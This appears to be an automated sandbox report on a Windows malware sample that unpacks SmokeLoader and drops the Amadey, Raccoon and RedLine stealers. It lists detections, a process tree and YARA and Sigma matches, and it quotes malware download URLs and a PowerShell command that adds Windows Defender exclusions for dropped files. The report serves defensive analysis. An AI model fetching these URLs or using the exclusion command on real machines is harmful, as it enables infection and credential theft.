Play interactive tour

Edit tour

Windows Analysis Report F7E3DjYJpC.exe

Overview

General Information

Sample Name:	F7E3DjYJpC.exe
Analysis ID:	511974
MD5:	537ad79dd97c59fcd1df5d8a26256192
SHA1:	7d43f8a6c25934e4299316ad7c9c8e8ce61416e3
SHA256:	17bb183c9e8f262c2bd91228e788f4613279c795573b558c3981501ee02811ba
Tags:	DofoilexeSmokeLoader
Infos:
Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Early bird code injection technique detected

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

DLL reload attack detected

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Sigma detected: Suspicious Script Execution From Temp Folder

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Writes to foreign memory regions

Renames NTDLL to bypass HIPS

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Sigma detected: Powershell Defender Exclusion

Queues an APC in another process (thread injection)

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to launch a program with higher privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

F7E3DjYJpC.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\F7E3DjYJpC.exe' MD5: 537AD79DD97C59FCD1DF5D8A26256192)

F7E3DjYJpC.exe (PID: 6860 cmdline: 'C:\Users\user\Desktop\F7E3DjYJpC.exe' MD5: 537AD79DD97C59FCD1DF5D8A26256192)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

9A4B.exe (PID: 5240 cmdline: C:\Users\user\AppData\Local\Temp\9A4B.exe MD5: DBD80FF6104BC503DD52179301E3F75F)

9A4B.exe (PID: 3864 cmdline: C:\Users\user\AppData\Local\Temp\9A4B.exe MD5: DBD80FF6104BC503DD52179301E3F75F)

69B.exe (PID: 6448 cmdline: C:\Users\user\AppData\Local\Temp\69B.exe MD5: F57B28AEC65D4691202B9524F84CC54A)

AdvancedRun.exe (PID: 2812 cmdline: 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

AdvancedRun.exe (PID: 6920 cmdline: 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

powershell.exe (PID: 6116 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

aspnet_regbrowsers.exe (PID: 6060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)

1254.exe (PID: 1748 cmdline: C:\Users\user\AppData\Local\Temp\1254.exe MD5: 42758E2569239A774BECDB12698B124C)

20BD.exe (PID: 6728 cmdline: C:\Users\user\AppData\Local\Temp\20BD.exe MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)

31F4.exe (PID: 5508 cmdline: C:\Users\user\AppData\Local\Temp\31F4.exe MD5: AB823DF932B3C2941A9015848EBDB97B)

31F4.exe (PID: 7164 cmdline: 31F4.exe MD5: AB823DF932B3C2941A9015848EBDB97B)

sqtvvs.exe (PID: 7052 cmdline: 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe' MD5: AB823DF932B3C2941A9015848EBDB97B)

3C84.exe (PID: 4544 cmdline: C:\Users\user\AppData\Local\Temp\3C84.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)

AdvancedRun.exe (PID: 5256 cmdline: 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

AdvancedRun.exe (PID: 6968 cmdline: 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

powershell.exe (PID: 5680 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

46D6.exe (PID: 5104 cmdline: C:\Users\user\AppData\Local\Temp\46D6.exe MD5: 31BE6099D31BDBF1ED339EFFDC1C7064)

5483.exe (PID: 6408 cmdline: C:\Users\user\AppData\Local\Temp\5483.exe MD5: 05F6A0E8F711FABBBB97A544F92FC25C)

9415.exe (PID: 6216 cmdline: C:\Users\user\AppData\Local\Temp\9415.exe MD5: 499FA9D12CBC441BF050DAD9FBB64D82)

31F4.exe (PID: 4284 cmdline: 'C:\Users\user\AppData\Local\Temp\31F4.exe' MD5: AB823DF932B3C2941A9015848EBDB97B)

31F4.exe (PID: 3476 cmdline: 31F4.exe MD5: AB823DF932B3C2941A9015848EBDB97B)

16BC.exe (PID: 6612 cmdline: C:\Users\user\AppData\Local\Temp\16BC.exe MD5: 9F279C4F486701860F5867EC433715A3)

iwbavbe (PID: 5156 cmdline: C:\Users\user\AppData\Roaming\iwbavbe MD5: 537AD79DD97C59FCD1DF5D8A26256192)

iwbavbe (PID: 6200 cmdline: C:\Users\user\AppData\Roaming\iwbavbe MD5: 537AD79DD97C59FCD1DF5D8A26256192)

iwbavbe (PID: 1500 cmdline: C:\Users\user\AppData\Roaming\iwbavbe MD5: 537AD79DD97C59FCD1DF5D8A26256192)

iwbavbe (PID: 6284 cmdline: C:\Users\user\AppData\Roaming\iwbavbe MD5: 537AD79DD97C59FCD1DF5D8A26256192)

ssbavbe (PID: 3296 cmdline: C:\Users\user\AppData\Roaming\ssbavbe MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\3C84.exe	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x20735:$x1: https://cdn.discordapp.com/attachments/ 0x207e9:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\69B.exe	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7b593:$x1: https://cdn.discordapp.com/attachments/ 0x7b647:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\1254.exe	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7a2f9:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source	Rule	Description	Author
00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Process Memory Space: 5483.exe PID: 6408	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.9A4B.exe.2cc15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.2.iwbavbe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.0.iwbavbe.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
23.0.3C84.exe.b10000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x20735:$x1: https://cdn.discordapp.com/attachments/ 0x207e9:$x1: https://cdn.discordapp.com/attachments/
13.0.iwbavbe.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
20.2.20BD.exe.2fa0e50.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.9A4B.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
20.3.20BD.exe.2fb0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
17.0.69B.exe.500000.2.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7b593:$x1: https://cdn.discordapp.com/attachments/ 0x7b647:$x1: https://cdn.discordapp.com/attachments/
12.1.9A4B.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
20.2.20BD.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.1.F7E3DjYJpC.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
23.0.3C84.exe.b10000.2.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x20735:$x1: https://cdn.discordapp.com/attachments/ 0x207e9:$x1: https://cdn.discordapp.com/attachments/
37.0.aspnet_regbrowsers.exe.400000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.0.aspnet_regbrowsers.exe.400000.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.F7E3DjYJpC.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
23.2.3C84.exe.b10000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x20735:$x1: https://cdn.discordapp.com/attachments/ 0x207e9:$x1: https://cdn.discordapp.com/attachments/
23.0.3C84.exe.b10000.1.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x20735:$x1: https://cdn.discordapp.com/attachments/ 0x207e9:$x1: https://cdn.discordapp.com/attachments/
13.0.iwbavbe.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
21.2.iwbavbe.2bc15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.0.F7E3DjYJpC.exe.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
17.0.69B.exe.500000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7b593:$x1: https://cdn.discordapp.com/attachments/ 0x7b647:$x1: https://cdn.discordapp.com/attachments/
17.0.69B.exe.500000.3.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7b593:$x1: https://cdn.discordapp.com/attachments/ 0x7b647:$x1: https://cdn.discordapp.com/attachments/
37.0.aspnet_regbrowsers.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.0.iwbavbe.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
19.0.1254.exe.550000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7a2f9:$x1: https://cdn.discordapp.com/attachments/
32.0.iwbavbe.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
37.0.aspnet_regbrowsers.exe.400000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.0.1254.exe.550000.1.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7a2f9:$x1: https://cdn.discordapp.com/attachments/
10.2.iwbavbe.2c515a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
19.0.1254.exe.550000.2.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7a2f9:$x1: https://cdn.discordapp.com/attachments/
23.0.3C84.exe.b10000.3.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x20735:$x1: https://cdn.discordapp.com/attachments/ 0x207e9:$x1: https://cdn.discordapp.com/attachments/
17.0.69B.exe.500000.1.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7b593:$x1: https://cdn.discordapp.com/attachments/ 0x7b647:$x1: https://cdn.discordapp.com/attachments/
32.0.iwbavbe.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.0.F7E3DjYJpC.exe.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
19.0.1254.exe.550000.3.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x7a2f9:$x1: https://cdn.discordapp.com/attachments/
4.0.F7E3DjYJpC.exe.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
37.0.aspnet_regbrowsers.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.1.iwbavbe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.1.iwbavbe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
27.3.5483.exe.48d0000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
27.3.5483.exe.48d0000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 38 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\69B.exe, ParentImage: C:\Users\user\AppData\Local\Temp\69B.exe, ParentProcessId: 6448, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, ProcessId: 6116

Sigma detected: Powershell Defender Exclusion

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\69B.exe, ParentImage: C:\Users\user\AppData\Local\Temp\69B.exe, ParentProcessId: 6448, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, ProcessId: 6116

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\69B.exe, ParentImage: C:\Users\user\AppData\Local\Temp\69B.exe, ParentProcessId: 6448, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force, ProcessId: 6116

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132800070265989765.6116.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR

Antivirus detection for URL or domain

Show sources

Source: http://sysaheu90.top/game.exe	Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe	Avira URL Cloud: Label: malware
Source: http://telegalive.top/T#	Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept	Avira URL Cloud: Label: malware
Source: http://hajezey1.top/	Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe	Avira URL Cloud: Label: malware
Source: http://telegalive.top/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Avira: detection malicious, Label: HEUR/AGEN.1138925
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe	Avira: detection malicious, Label: HEUR/AGEN.1138925

Multi AV Scanner detection for submitted file

Show sources

Source: F7E3DjYJpC.exe

Virustotal: Detection: 28%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\20BD.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\3D90.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\69B.exe	ReversingLabs: Detection: 39%

Machine Learning detection for sample

Show sources

Source: F7E3DjYJpC.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\iwbavbe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5483.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2CF4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\16BC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\39A7.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ssbavbe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\abbavbe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3D90.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Joe Sandbox ML: detected

Source: 13.0.iwbavbe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.5.unpack	Avira: Label: TR/AD.Amadey.ezxiu
Source: 26.0.31F4.exe.400000.7.unpack	Avira: Label: TR/AD.Amadey.ezxiu
Source: 13.0.iwbavbe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.iwbavbe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.13.unpack	Avira: Label: TR/AD.Amadey.ezxiu
Source: 26.0.31F4.exe.400000.17.unpack	Avira: Label: TR/AD.Amadey.ezxiu
Source: 32.0.iwbavbe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.15.unpack	Avira: Label: TR/AD.Amadey.ezxiu
Source: 32.0.iwbavbe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.iwbavbe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.iwbavbe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.9.unpack	Avira: Label: TR/AD.Amadey.ezxiu
Source: 4.0.F7E3DjYJpC.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.11.unpack	Avira: Label: TR/AD.Amadey.ezxiu
Source: 13.0.iwbavbe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: unknown

HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49841 version: TLS 1.0

Source: F7E3DjYJpC.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\AppData\Local\Temp\20BD.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49817 version: TLS 1.2

Source:	Binary string: C:\vojos\fuw.pdb source: 20BD.exe, 00000014.00000002.863191806.0000000000417000.00000002.00020000.sdmp
Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 31F4.exe, 00000016.00000002.938495921.0000000003625000.00000004.00000001.sdmp, 31F4.exe, 0000001A.00000000.887030697.0000000000400000.00000040.00000001.sdmp, 31F4.exe, 00000024.00000000.938689458.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.851564916.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp
